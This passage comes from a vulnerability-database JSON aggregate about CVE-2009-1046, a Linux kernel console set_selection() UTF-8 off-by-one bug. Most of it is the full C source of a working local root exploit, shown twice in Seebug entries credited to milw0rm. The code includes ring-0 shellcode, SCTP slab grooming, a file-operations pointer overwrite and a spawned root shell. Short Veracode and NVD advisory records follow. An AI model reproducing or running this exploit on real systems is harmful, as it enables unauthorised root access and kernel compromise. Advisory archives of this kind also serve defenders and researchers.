peer");\r\n}\r\n\r\n\r\nstatic void conn_and_write(int fd, struct sockaddr_in *s, __u16 stream)\r\n{\r\n connect_peer(fd,s);\r\n write_sctp(fd, s, stream);\r\n}\r\n\r\n\r\nstatic int clone_thread(void*useless)\r\n{\r\n int o = 1;\r\n int c=0,idx=0;\r\n int fd, ret;\r\n struct sockaddr_in tmp;\r\n socklen_t len;\r\n\r\n bindcpu();\r\n server_s.sin_family = PF_INET;\r\n server_s.sin_port = htons(srvport); \r\n server_s.sin_addr.s_addr = inet_addr(LOCALHOST);\r\n\r\n fd = socket(PF_INET, SOCK_STREAM, IPPROTO_SCTP);\r\n if(fd < 0)\r\n return -1;\r\n\r\n set_sctp_sock_opt(fd, SCTP_STREAM, SCTP_STREAM); \r\n setsockopt(fd, SOL_SOCKET, SO_REUSEADDR, (char *)&o, sizeof(o));\r\n\r\n ret = bind(fd, (struct sockaddr *)&server_s, sizeof(struct sockaddr_in));\r\n if(ret < 0)\r\n return -1;\r\n\r\n ret = listen(fd, 100);\r\n if(ret < 0)\r\n return -1;\r\n\r\n len = sizeof(struct sockaddr_in);\r\n while((ret = accept(fd, (struct sockaddr *)&tmp, &len)) >= 0)\r\n {\r\n if(dorec != 0 && c >= dorec && idx < 10)\r\n {\r\n g_array[idx] = ret;\r\n if(idx==9)\r\n {\r\n fd_zmap_srv = ret;\r\n caddr = tmp;\r\n break;\r\n }\r\n idx++;\r\n }\r\n c++; \r\n write_sctp(ret, &tmp, zstream);\r\n }\r\n \r\n sleep(1);\r\n return 0; \r\n}\r\n\r\n\r\nstatic int do_mmap(unsigned long base, int npages)\r\n{\r\n void*addr = mmap((void*)base, PAGE_SIZE*npages,\r\n PROT_READ|PROT_WRITE|PROT_EXEC, \r\n MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);\r\n\r\n if(MAP_FAILED == addr)\r\n return -1;\r\n\r\n memset(addr, 0x00, PAGE_SIZE*npages);\r\n \r\n return 0;\r\n}\r\n\r\npid_t start_listener()\r\n{\r\n pid_t pid;\r\n pid = clone(clone_thread, cstack+STACK_SIZE-8, \r\n CLONE_VM|CLONE_FILES|SIGCHLD, NULL);\r\n \r\n return pid;\r\n} \r\n\r\nstatic void do_socks(struct sockaddr_in *s, __u16 stream)\r\n{\r\n int i,fd;\r\n int n_objs = get_total_object(kmalloc_fd), tmp_n_objs;\r\n int next=8;\r\n\r\n for(i=0; next != 0; i++)\r\n {\r\n fd = create_and_init();\r\n\r\n tmp_n_objs = get_total_object(kmalloc_fd); \r\n if(!dorec && tmp_n_objs != n_objs)\r\n dorec=i; \r\n\r\n conn_and_write(fd, s, stream);\r\n if(dorec)\r\n next--;\r\n }\r\n}\r\n\r\n\r\nstatic void clr(int fd)\r\n{\r\n /* use termcap instead..*/\r\n write(fd, "\\33[H\\33[J", 6); \r\n}\r\n\r\nstatic char tiobuffer[2048];\r\nvoid alloc_tioclinux()\r\n{\r\n int i;\r\n char out[128*3];\r\n /* Unicode Character 'BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL' (U+253C) */\r\n char utf8[3] = { 0xE2, 0x94, 0xBC }; \r\n //char utf8[3] = { 0xE2, 0x80, 0xBC }; \r\n struct tiocl_selection *sel;\r\n char *t;\r\n void *v = malloc(sizeof(struct tiocl_selection) + 1);\r\n t = (char*)v; \r\n sel = (struct tiocl_selection *)(t+1);\r\n memset(out, 0x41, sizeof(out)); \r\n for(i=0; i<128; i++) \r\n {\r\n tiobuffer[(i*3)]=utf8[0];\r\n tiobuffer[(i*3)+1]=utf8[1];\r\n tiobuffer[(i*3)+2]=utf8[2];\r\n }\r\n\r\n *t = TIOCL_SETSEL;\r\n sel->xs = 1;\r\n sel->ys = 1;\r\n sel->xe = 43;\r\n //sel->xe = 42; /* no overflow */\r\n sel->ye = 1;\r\n \r\n write(1, tiobuffer, sizeof(tiobuffer));\r\n if(ioctl(1, TIOCLINUX, v) < 0)\r\n __fatal("[!!] Unable to call TIOCLINUX ioctl(), need stdout to be on a virtual console\\n");\r\n}\r\n\r\n\r\n\r\nstatic void migrate_evil_fd()\r\n{\r\n int i;\r\n pid_t child;\r\n\r\n __msg("[**] Migrate evil unsafe fds to child process..\\n");\r\n child = fork();\r\n if(!child)\r\n {\r\n\r\n /* preserve evil fds */\r\n setsid(); \r\n if(!cankill) /* cant die .. */\r\n while(1)\r\n sleep(1);\r\n else\r\n {\r\n sleep(10); /* wait execve() before */ \r\n for(i=0; i<4; i++)\r\n close(unsafe_fd[i]); \r\n\r\n exit(1);\r\n }\r\n }\r\n else\r\n {\r\n if(!cankill)\r\n __msg_f("[**] Child process %d _MUST_ NOT die ... keep it alive:)\\n", child);\r\n }\r\n}\r\n\r\n\r\nstatic void trigger_fault()\r\n{\r\n char *argv[]={"/bin/sh", NULL};\r\n int fd,i;\r\n\r\n fd = open("/proc/timer_list", O_RDONLY);\r\n if(fd >= 0)\r\n {\r\n ioctl(fd, 0, 0);\r\n __free_stuff();\r\n migrate_evil_fd();\r\n \r\n for(i=0; i<4; i++)\r\n close(unsafe_fd[i]);\r\n\r\n if(!getuid())\r\n {\r\n __msg("[**] Got root!\\n");\r\n execve("/bin/sh", argv, NULL); \r\n }\r\n }\r\n else\r\n {\r\n __msg("[**] Cannot open /proc/timer_list");\r\n __free_stuff();\r\n }\r\n}\r\n\r\n\r\n\r\nstatic void overwrite_fops( int sender, \r\n struct sockaddr_in *to_receiver,\r\n int receiver)\r\n{\r\n char *p = NULL;\r\n if(!highpage)\r\n p++;\r\n else\r\n p = (void*)STRUCT_PAGE_ALT;\r\n\r\n __u64 *uip = (__u64*)p; \r\n *uip = fops;\r\n write_sctp(sender, to_receiver, 1); \r\n sleep(1);\r\n trigger_fault();\r\n}\r\n\r\nstatic __u16 get_port()\r\n{\r\n __u16 r = (__u16)getpid();\r\n if(r <= 0x400)\r\n r+=0x400;\r\n return r;\r\n}\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n int peerx, peery,i;\r\n __u64 *patch;\r\n\r\n srvport = get_port();\r\n\r\n uid=getuid();\r\n gid=getgid();\r\n fops=get_fops_addr() + 64; \r\n if(!fops)\r\n {\r\n __msg("[!!] Unable to locate symbols...\\n");\r\n return 1;\r\n }\r\n\r\n __msg_f("[**] Patching ring0 shellcode with userspace addr: %p\\n", ring0c);\r\n patch = (__u64*)(ring0 + CJUMP_OFF);\r\n *patch = (__u64)ring0c;\r\n\r\n __msg_f("[**] Using port: %d\\n", srvport);\r\n __msg("[**] Getting slab info...\\n");\r\n kmalloc_fd = get_kmalloc_fd();\r\n if(!get_total_object(kmalloc_fd)) \r\n __fatal("[!!] Only SLUB allocator supported\\n");\r\n \r\n\r\n __msg("[**] Mapping Segments...\\n"); \r\n __msg("[**] Trying mapping safe page...");\r\n if(do_mmap(STRUCT_PAGE, 1) < 0)\r\n {\r\n __msg("Page Protection Present (Unable to Map Safe Page)\\n");\r\n __msg("[**] Mapping High Address Page (dont kill placeholder child)\\n");\r\n if(do_mmap(STRUCT_PAGE_ALT, 1) < 0)\r\n __fatal_errno("mmap"); \r\n\r\n cankill=0; /* dont kill child owning unsafe fds.. */\r\n highpage=1; /* ssnmap in higher pages */\r\n zstream=STREAM_ZERO_ALT; \r\n } \r\n else\r\n __msg("Done\\n");\r\n\r\n __msg("[**] Mapping Code Page... ");\r\n if(do_mmap(CODE_PAGE, 1) < 0)\r\n __fatal_errno("mmap");\r\n else\r\n __msg("Done\\n");\r\n\r\n memcpy((void*)CODE_PAGE, ring0, sizeof(ring0));\r\n\r\n __msg("[**] Binding on CPU 0\\n"); \r\n bindcpu(); \r\n\r\n __msg("[**] Start Server Thread..\\n");\r\n child = start_listener();\r\n sleep(3); \r\n \r\n do_socks(&server_s, zstream);\r\n for(i=0; i<7; i++)\r\n {\r\n close(g_array[8-1-i]); \r\n }\r\n clr(1); \r\n alloc_tioclinux(); // trigger overflow\r\n peerx = create_and_init();\r\n connect_peer(peerx, &server_s);\r\n peery = create_and_init();\r\n connect_peer(peery, &server_s);\r\n \r\n sleep(1);\r\n\r\n unsafe_fd[0] = peerx;\r\n unsafe_fd[1] = g_array[8];\r\n unsafe_fd[2] = peery;\r\n unsafe_fd[3] = g_array[9];\r\n \r\n __msg("\\n"); \r\n __msg_f("[**] Umapped end-to-end fd: %d\\n", fd_zmap_srv); \r\n __msg_f("[**] Unsafe fd: ( ");\r\n\r\n for(i=0; i<4; i++)\r\n __msg_f("%d ", unsafe_fd[i]);\r\n __msg(")\\n"); \r\n \r\n\r\n __msg("[**] Hijacking fops...\\n");\r\n overwrite_fops(fd_zmap_srv, &caddr, peery);\r\n\r\n /* if u get here.. something nasty happens...may crash..*/\r\n __free_stuff();\r\n __msg("[**] Exploit failed.. freezing process\\n");\r\n kill(getpid(), SIGSTOP);\r\n return 0;\r\n}\r\n\r\n#endif\r\n\r\n// milw0rm.com [2009-07-09]\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-66685", "cvss": {"score": 4.7, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T18:46:05", "description": "No description provided by source.", "cvss3": {}, "published": "2009-07-10T00:00:00", "type": "seebug", "title": "Linux Kernel <= 2.6.28.3 set_selection() UTF-8 Off By One Local Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2009-1046"], "modified": "2009-07-10T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-11780", "id": "SSV:11780", "sourceData": "\n /* CVE-2009-1046 Virtual Console UTF-8 set_selection() off-by-one(two) Memory Corruption\r\n * Linux Kernel <= 2.6.28.3 \r\n *\r\n * coded by: sgrakkyu <at> antifork.org\r\n * http://kernelbof.blogspot.com/2009/07/even-when-one-byte-matters.html\r\n *\r\n * Dedicated to all people talking nonsense about non exploitability of kernel heap off-by-one overflow\r\n *\r\n * NOTE-1: you need a virtual console attached to the standard output (stdout) \r\n * - physical login\r\n * - ptrace() against some process with the same uid already attached to a VC\r\n * - remote management ..\r\n *\r\n * NOTE-2: UTF-8 character used is: U+253C - it seems to be supported in most standard console fonts\r\n * but if it's _not_: change it (and change respectively STREAM_ZERO and STREAM_ZERO_ALT defines)\r\n * If you use an unsupported character expect some sort of recursive fatal ooops:)\r\n *\r\n * Designed to be built as x86-64 binary only (SLUB ONLY)\r\n * SCTP stack has to be available\r\n * \r\n * Tested on target:\r\n * Ubuntu 8.04 x86_64 (2.6.24_16-23 generic/server)\r\n * Ubuntu 8.10 x86_64 (2.6.27_7-10 genric/server)\r\n * Fedora Core 10 x86_64 (default installed kernel - without selinux)\r\n *\r\n */\r\n\r\n\r\n#define _GNU_SOURCE\r\n#include <stdio.h>\r\n#include <sched.h>\r\n#include <errno.h>\r\n#include <netinet/in.h>\r\n#include <netinet/sctp.h>\r\n#include <arpa/inet.h>\r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include <sys/ioctl.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <linux/tiocl.h>\r\n#include <sys/stat.h>\r\n#include <fcntl.h>\r\n#include <signal.h>\r\n#include <sys/mman.h>\r\n#include <sched.h>\r\n#include <unistd.h>\r\n#include <fcntl.h>\r\n\r\n#ifndef __x86_64__\r\n#error "Architecture Unsupported"\r\n#error "This code was written for x86-64 target and has to be built as x86-64 binary"\r\n#else\r\n\r\n#ifndef __u8\r\n#define __u8 uint8_t\r\n#endif\r\n#ifndef __u16\r\n#define __u16 uint16_t\r\n#endif\r\n#ifndef __u32\r\n#define __u32 uint32_t\r\n#endif\r\n#ifndef __u64 \r\n#define __u64 uint64_t\r\n#endif\r\n\r\n\r\n#define STREAM_ZERO 10\r\n#define STREAM_ZERO_ALT 12\r\n\r\n#define SCTP_STREAM 22\r\n#define STACK_SIZE 0x1000\r\n#define PAGE_SIZE 0x1000\r\n#define STRUCT_PAGE 0x0000000000000000\r\n#define STRUCT_PAGE_ALT 0x0000000100000000 \r\n#define CODE_PAGE 0x0000000000010000\r\n#define LOCALHOST "127.0.0.1"\r\n#define KMALLOC "kmalloc-128"\r\n#define TIMER_LIST_FOPS "timer_list_fops"\r\n\r\n#define __msg_f(format, args...) \\\r\n do { fprintf(stdout, format, ## args); } while(0)\r\n\r\n#define __msg(msg) \\\r\n do { fprintf(stdout, "%s", msg); } while(0)\r\n\r\n#define __fatal_errno(msg) \\\r\ndo { perror(msg); __free_stuff(); exit(1); } while(0)\r\n\r\n#define __fatal(msg) \\\r\ndo { fprintf(stderr, msg); __free_stuff(); exit(1); } while(0)\r\n\r\n\r\n\r\n#define CJUMP_OFF 13\r\nchar ring0[]=\r\n"\\x57" // push %rdi\r\n"\\x50" // push %rax\r\n"\\x65\\x48\\x8b\\x3c\\x25\\x00\\x00\\x00\\x00" // mov %gs:0x0,%rdi\r\n"\\x48\\xb8\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41" // mov xxx, %rax\r\n"\\xff\\xd0" // callq *%rax\r\n"\\x58" // pop %rax\r\n"\\x5f" // pop %rdi\r\n"\\xc3"; // retq\r\n\r\n\r\n/* conn struct */\r\nstatic __u16 srvport;\r\nstruct sockaddr_in server_s;\r\nstatic struct sockaddr_in caddr;\r\n\r\n/* some fds.. */\r\nstatic int g_array[10];\r\nstatic int fd_zmap_srv=-1;\r\nstatic int kmalloc_fd=-1;\r\nstatic int unsafe_fd[4] = {-1,-1,-1,-1}; \r\n\r\n/* misc */\r\nstatic int dorec = 0, cankill=1, highpage=0;\r\nstatic char cstack[STACK_SIZE*2];\r\nstatic __u16 zstream=STREAM_ZERO;\r\nstatic __u32 uid,gid;\r\nstatic __u64 fops;\r\nstatic pid_t child=0;\r\nstatic char symbuf[20000];\r\n\r\nstatic void __free_stuff()\r\n{\r\n int i;\r\n for(i=3; i<2048; i++) \r\n {\r\n if((unsafe_fd[0] == i || unsafe_fd[1] == i || \r\n unsafe_fd[2] == i || unsafe_fd[3] == i))\r\n continue; \r\n\r\n close(i);\r\n }\r\n}\r\n\r\nstatic void bindcpu()\r\n{\r\n cpu_set_t set;\r\n CPU_ZERO(&set);\r\n CPU_SET(0, &set);\r\n \r\n if(sched_setaffinity(0, sizeof(cpu_set_t), &set) < 0)\r\n __fatal_errno("setaffinity");\r\n}\r\n\r\n/* parse functions are not bof-free:) */\r\nstatic __u64 get_fops_addr()\r\n{\r\n FILE* stream;\r\n char fbuf[256];\r\n char addr[32];\r\n \r\n stream = fopen("/proc/kallsyms", "r");\r\n if(stream < 0)\r\n __fatal_errno("open: kallsyms");\r\n\r\n memset(fbuf, 0x00, sizeof(fbuf));\r\n while(fgets(fbuf, 256, stream) > 0)\r\n {\r\n char *p = fbuf;\r\n char *a = addr;\r\n memset(addr, 0x00, sizeof(addr));\r\n fbuf[strlen(fbuf)-1] = 0;\r\n while(*p != ' ')\r\n *a++ = *p++; \r\n p += 3;\r\n if(!strcmp(p, TIMER_LIST_FOPS))\r\n return strtoul(addr, NULL, 16); \r\n }\r\n\r\n return 0;\r\n}\r\n\r\nstatic int get_total_object(int fd)\r\n{\r\n char name[32];\r\n char used[32];\r\n char total[32];\r\n char *ptr[] = {name, used, total};\r\n int ret,i,toread=sizeof(symbuf)-1;\r\n char *p = symbuf;\r\n\r\n lseek(fd, 0, SEEK_SET);\r\n memset(symbuf, 0x00, sizeof(symbuf));\r\n while( (ret = read(fd, p, toread)) > 0)\r\n {\r\n p += ret; \r\n toread -= ret;\r\n }\r\n\r\n p = symbuf;\r\n do\r\n {\r\n for(i=0; i<sizeof(ptr)/sizeof(void*); i++)\r\n {\r\n char *d = ptr[i];\r\n while(*p != ' ')\r\n *d++ = *p++; \r\n *d = 0;\r\n while(*p == ' ')\r\n p++;\r\n }\r\n \r\n while(*p++ != '\\n');\r\n \r\n if(!strcmp(KMALLOC, name))\r\n return atoi(total); \r\n\r\n } while(*p != 0);\r\n return 0;\r\n}\r\n\r\n\r\nstatic void ring0c(void* t)\r\n{\r\n int i;\r\n __u32 *p = t;\r\n for(i=0; i<1100; i++,p++)\r\n {\r\n if(p[0] == uid && p[1] == uid && p[2] == uid && p[3] == uid &&\r\n p[4] == gid && p[5] == gid && p[6] == gid && p[7] == gid)\r\n {\r\n p[0] = p[1] = p[2] = p[3] = 0;\r\n p[4] = p[5] = p[6] = p[7] = 0;\r\n /* dont care about caps */\r\n break;\r\n }\r\n }\r\n}\r\n\r\n\r\nstatic int get_kmalloc_fd()\r\n{\r\n int fd;\r\n fd = open("/proc/slabinfo", O_RDONLY);\r\n if(fd < 0)\r\n __fatal_errno("open: slabinfo");\r\n return fd;\r\n}\r\n\r\n\r\nstatic int write_sctp(int fd, struct sockaddr_in *s, int channel)\r\n{\r\n int ret;\r\n ret = sctp_sendmsg(fd, "a", 1,\r\n (struct sockaddr *)s, sizeof(struct sockaddr_in),\r\n 0, 0, channel, 0 ,0);\r\n return ret;\r\n}\r\n\r\n\r\nstatic void set_sctp_sock_opt(int fd, __u16 in, __u16 out)\r\n{\r\n struct sctp_initmsg msg;\r\n int val=1;\r\n socklen_t len_sctp = sizeof(struct sctp_initmsg);\r\n getsockopt(fd, SOL_SCTP, SCTP_INITMSG, &msg, &len_sctp);\r\n msg.sinit_num_ostreams=out; \r\n msg.sinit_max_instreams=in;\r\n setsockopt(fd, SOL_SCTP, SCTP_INITMSG, &msg, len_sctp);\r\n setsockopt(fd, SOL_SCTP, SCTP_NODELAY, (char*)&val, sizeof(val));\r\n}\r\n\r\n\r\nstatic int create_and_init(void)\r\n{\r\n int fd = socket(PF_INET, SOCK_STREAM, IPPROTO_SCTP);\r\n if(fd < 0)\r\n __fatal_errno("socket: sctp");\r\n set_sctp_sock_opt(fd, SCTP_STREAM, SCTP_STREAM);\r\n return fd;\r\n}\r\n\r\n\r\nstatic void connect_peer(int fd, struct sockaddr_in *s)\r\n{ \r\n int ret;\r\n ret = connect(fd, (struct sockaddr *)s, sizeof(struct sockaddr_in));\r\n if(ret < 0)\r\n __fatal_errno("connect: one peer");\r\n}\r\n\r\n\r\nstatic void conn_and_write(int fd, struct sockaddr_in *s, __u16 stream)\r\n{\r\n connect_peer(fd,s);\r\n write_sctp(fd, s, stream);\r\n}\r\n\r\n\r\nstatic int clone_thread(void*useless)\r\n{\r\n int o = 1;\r\n int c=0,idx=0;\r\n int fd, ret;\r\n struct sockaddr_in tmp;\r\n socklen_t len;\r\n\r\n bindcpu();\r\n server_s.sin_family = PF_INET;\r\n server_s.sin_port = htons(srvport); \r\n server_s.sin_addr.s_addr = inet_addr(LOCALHOST);\r\n\r\n fd = socket(PF_INET, SOCK_STREAM, IPPROTO_SCTP);\r\n if(fd < 0)\r\n return -1;\r\n\r\n set_sctp_sock_opt(fd, SCTP_STREAM, SCTP_STREAM); \r\n setsockopt(fd, SOL_SOCKET, SO_REUSEADDR, (char *)&o, sizeof(o));\r\n\r\n ret = bind(fd, (struct sockaddr *)&server_s, sizeof(struct sockaddr_in));\r\n if(ret < 0)\r\n return -1;\r\n\r\n ret = listen(fd, 100);\r\n if(ret < 0)\r\n return -1;\r\n\r\n len = sizeof(struct sockaddr_in);\r\n while((ret = accept(fd, (struct sockaddr *)&tmp, &len)) >= 0)\r\n {\r\n if(dorec != 0 && c >= dorec && idx < 10)\r\n {\r\n g_array[idx] = ret;\r\n if(idx==9)\r\n {\r\n fd_zmap_srv = ret;\r\n caddr = tmp;\r\n break;\r\n }\r\n idx++;\r\n }\r\n c++; \r\n write_sctp(ret, &tmp, zstream);\r\n }\r\n \r\n sleep(1);\r\n return 0; \r\n}\r\n\r\n\r\nstatic int do_mmap(unsigned long base, int npages)\r\n{\r\n void*addr = mmap((void*)base, PAGE_SIZE*npages,\r\n PROT_READ|PROT_WRITE|PROT_EXEC, \r\n MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);\r\n\r\n if(MAP_FAILED == addr)\r\n return -1;\r\n\r\n memset(addr, 0x00, PAGE_SIZE*npages);\r\n \r\n return 0;\r\n}\r\n\r\npid_t start_listener()\r\n{\r\n pid_t pid;\r\n pid = clone(clone_thread, cstack+STACK_SIZE-8, \r\n CLONE_VM|CLONE_FILES|SIGCHLD, NULL);\r\n \r\n return pid;\r\n} \r\n\r\nstatic void do_socks(struct sockaddr_in *s, __u16 stream)\r\n{\r\n int i,fd;\r\n int n_objs = get_total_object(kmalloc_fd), tmp_n_objs;\r\n int next=8;\r\n\r\n for(i=0; next != 0; i++)\r\n {\r\n fd = create_and_init();\r\n\r\n tmp_n_objs = get_total_object(kmalloc_fd); \r\n if(!dorec && tmp_n_objs != n_objs)\r\n dorec=i; \r\n\r\n conn_and_write(fd, s, stream);\r\n if(dorec)\r\n next--;\r\n }\r\n}\r\n\r\n\r\nstatic void clr(int fd)\r\n{\r\n /* use termcap instead..*/\r\n write(fd, "\\33[H\\33[J", 6); \r\n}\r\n\r\nstatic char tiobuffer[2048];\r\nvoid alloc_tioclinux()\r\n{\r\n int i;\r\n char out[128*3];\r\n /* Unicode Character 'BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL' (U+253C) */\r\n char utf8[3] = { 0xE2, 0x94, 0xBC }; \r\n //char utf8[3] = { 0xE2, 0x80, 0xBC }; \r\n struct tiocl_selection *sel;\r\n char *t;\r\n void *v = malloc(sizeof(struct tiocl_selection) + 1);\r\n t = (char*)v; \r\n sel = (struct tiocl_selection *)(t+1);\r\n memset(out, 0x41, sizeof(out)); \r\n for(i=0; i<128; i++) \r\n {\r\n tiobuffer[(i*3)]=utf8[0];\r\n tiobuffer[(i*3)+1]=utf8[1];\r\n tiobuffer[(i*3)+2]=utf8[2];\r\n }\r\n\r\n *t = TIOCL_SETSEL;\r\n sel->xs = 1;\r\n sel->ys = 1;\r\n sel->xe = 43;\r\n //sel->xe = 42; /* no overflow */\r\n sel->ye = 1;\r\n \r\n write(1, tiobuffer, sizeof(tiobuffer));\r\n if(ioctl(1, TIOCLINUX, v) < 0)\r\n __fatal("[!!] Unable to call TIOCLINUX ioctl(), need stdout to be on a virtual console\\n");\r\n}\r\n\r\n\r\n\r\nstatic void migrate_evil_fd()\r\n{\r\n int i;\r\n pid_t child;\r\n\r\n __msg("[**] Migrate evil unsafe fds to child process..\\n");\r\n child = fork();\r\n if(!child)\r\n {\r\n\r\n /* preserve evil fds */\r\n setsid(); \r\n if(!cankill) /* cant die .. */\r\n while(1)\r\n sleep(1);\r\n else\r\n {\r\n sleep(10); /* wait execve() before */ \r\n for(i=0; i<4; i++)\r\n close(unsafe_fd[i]); \r\n\r\n exit(1);\r\n }\r\n }\r\n else\r\n {\r\n if(!cankill)\r\n __msg_f("[**] Child process %d _MUST_ NOT die ... keep it alive:)\\n", child);\r\n }\r\n}\r\n\r\n\r\nstatic void trigger_fault()\r\n{\r\n char *argv[]={"/bin/sh", NULL};\r\n int fd,i;\r\n\r\n fd = open("/proc/timer_list", O_RDONLY);\r\n if(fd >= 0)\r\n {\r\n ioctl(fd, 0, 0);\r\n __free_stuff();\r\n migrate_evil_fd();\r\n \r\n for(i=0; i<4; i++)\r\n close(unsafe_fd[i]);\r\n\r\n if(!getuid())\r\n {\r\n __msg("[**] Got root!\\n");\r\n execve("/bin/sh", argv, NULL); \r\n }\r\n }\r\n else\r\n {\r\n __msg("[**] Cannot open /proc/timer_list");\r\n __free_stuff();\r\n }\r\n}\r\n\r\n\r\n\r\nstatic void overwrite_fops( int sender, \r\n struct sockaddr_in *to_receiver,\r\n int receiver)\r\n{\r\n char *p = NULL;\r\n if(!highpage)\r\n p++;\r\n else\r\n p = (void*)STRUCT_PAGE_ALT;\r\n\r\n __u64 *uip = (__u64*)p; \r\n *uip = fops;\r\n write_sctp(sender, to_receiver, 1); \r\n sleep(1);\r\n trigger_fault();\r\n}\r\n\r\nstatic __u16 get_port()\r\n{\r\n __u16 r = (__u16)getpid();\r\n if(r <= 0x400)\r\n r+=0x400;\r\n return r;\r\n}\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n int peerx, peery,i;\r\n __u64 *patch;\r\n\r\n srvport = get_port();\r\n\r\n uid=getuid();\r\n gid=getgid();\r\n fops=get_fops_addr() + 64; \r\n if(!fops)\r\n {\r\n __msg("[!!] Unable to locate symbols...\\n");\r\n return 1;\r\n }\r\n\r\n __msg_f("[**] Patching ring0 shellcode with userspace addr: %p\\n", ring0c);\r\n patch = (__u64*)(ring0 + CJUMP_OFF);\r\n *patch = (__u64)ring0c;\r\n\r\n __msg_f("[**] Using port: %d\\n", srvport);\r\n __msg("[**] Getting slab info...\\n");\r\n kmalloc_fd = get_kmalloc_fd();\r\n if(!get_total_object(kmalloc_fd)) \r\n __fatal("[!!] Only SLUB allocator supported\\n");\r\n \r\n\r\n __msg("[**] Mapping Segments...\\n"); \r\n __msg("[**] Trying mapping safe page...");\r\n if(do_mmap(STRUCT_PAGE, 1) < 0)\r\n {\r\n __msg("Page Protection Present (Unable to Map Safe Page)\\n");\r\n __msg("[**] Mapping High Address Page (dont kill placeholder child)\\n");\r\n if(do_mmap(STRUCT_PAGE_ALT, 1) < 0)\r\n __fatal_errno("mmap"); \r\n\r\n cankill=0; /* dont kill child owning unsafe fds.. */\r\n highpage=1; /* ssnmap in higher pages */\r\n zstream=STREAM_ZERO_ALT; \r\n } \r\n else\r\n __msg("Done\\n");\r\n\r\n __msg("[**] Mapping Code Page... ");\r\n if(do_mmap(CODE_PAGE, 1) < 0)\r\n __fatal_errno("mmap");\r\n else\r\n __msg("Done\\n");\r\n\r\n memcpy((void*)CODE_PAGE, ring0, sizeof(ring0));\r\n\r\n __msg("[**] Binding on CPU 0\\n"); \r\n bindcpu(); \r\n\r\n __msg("[**] Start Server Thread..\\n");\r\n child = start_listener();\r\n sleep(3); \r\n \r\n do_socks(&server_s, zstream);\r\n for(i=0; i<7; i++)\r\n {\r\n close(g_array[8-1-i]); \r\n }\r\n clr(1); \r\n alloc_tioclinux(); // trigger overflow\r\n peerx = create_and_init();\r\n connect_peer(peerx, &server_s);\r\n peery = create_and_init();\r\n connect_peer(peery, &server_s);\r\n \r\n sleep(1);\r\n\r\n unsafe_fd[0] = peerx;\r\n unsafe_fd[1] = g_array[8];\r\n unsafe_fd[2] = peery;\r\n unsafe_fd[3] = g_array[9];\r\n \r\n __msg("\\n"); \r\n __msg_f("[**] Umapped end-to-end fd: %d\\n", fd_zmap_srv); \r\n __msg_f("[**] Unsafe fd: ( ");\r\n\r\n for(i=0; i<4; i++)\r\n __msg_f("%d ", unsafe_fd[i]);\r\n __msg(")\\n"); \r\n \r\n\r\n __msg("[**] Hijacking fops...\\n");\r\n overwrite_fops(fd_zmap_srv, &caddr, peery);\r\n\r\n /* if u get here.. something nasty happens...may crash..*/\r\n __free_stuff();\r\n __msg("[**] Exploit failed.. freezing process\\n");\r\n kill(getpid(), SIGSTOP);\r\n return 0;\r\n}\r\n\r\n#endif\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-11780", "cvss": {"score": 4.7, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "veracode": [{"lastseen": "2022-07-27T10:33:05", "description": "kernel-rt is vulnerable to denial of service. An off-by-two error was found in the set_selection() function of the Linux kernel. This could allow a local, unprivileged user to cause a denial of service when making a selection of characters in a UTF-8 console. Note: physical console access is required to exploit this issue. \n", "cvss3": {}, "published": "2020-04-10T00:37:50", "type": "veracode", "title": "Denial Of Service (DoS)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.7, "vectorString": "AV:L/AC:M/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1046"], "modified": "2022-04-19T18:18:44", "id": "VERACODE:23845", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-23845/summary", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:N/I:N/A:C"}}], "cve": [{"lastseen": "2023-02-09T14:00:42", "description": "The console selection feature in the Linux kernel 2.6.28 before 2.6.28.4, 2.6.25, and possibly earlier versions, when the UTF-8 console is used, allows physically proximate attackers to cause a denial of service (memory corruption) by selecting a small number of 3-byte UTF-8 characters, which triggers an \"off-by-two memory error.\" NOTE: it is not clear whether this issue crosses privilege boundaries.", "cvss3": {}, "published": "2009-03-23T16:30:00", "type": "cve", "title": "CVE-2009-1046", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.7, "vectorString": "AV:L/AC:M/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1046"], "modified": "2016-05-31T15:08:00", "cpe": ["cpe:/o:linux:linux_kernel:2.6.25", "cpe:/o:linux:linux_kernel:2.6.28.3", "cpe:/o:linux:linux_kernel:2.6.28.1", "cpe:/o:linux:linux_kernel:2.6.28", "cpe:/o:linux:linux_kernel:2.6.28.2"], "id": "CVE-2009-1046", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1046", "cvss": {"score": 4.7, 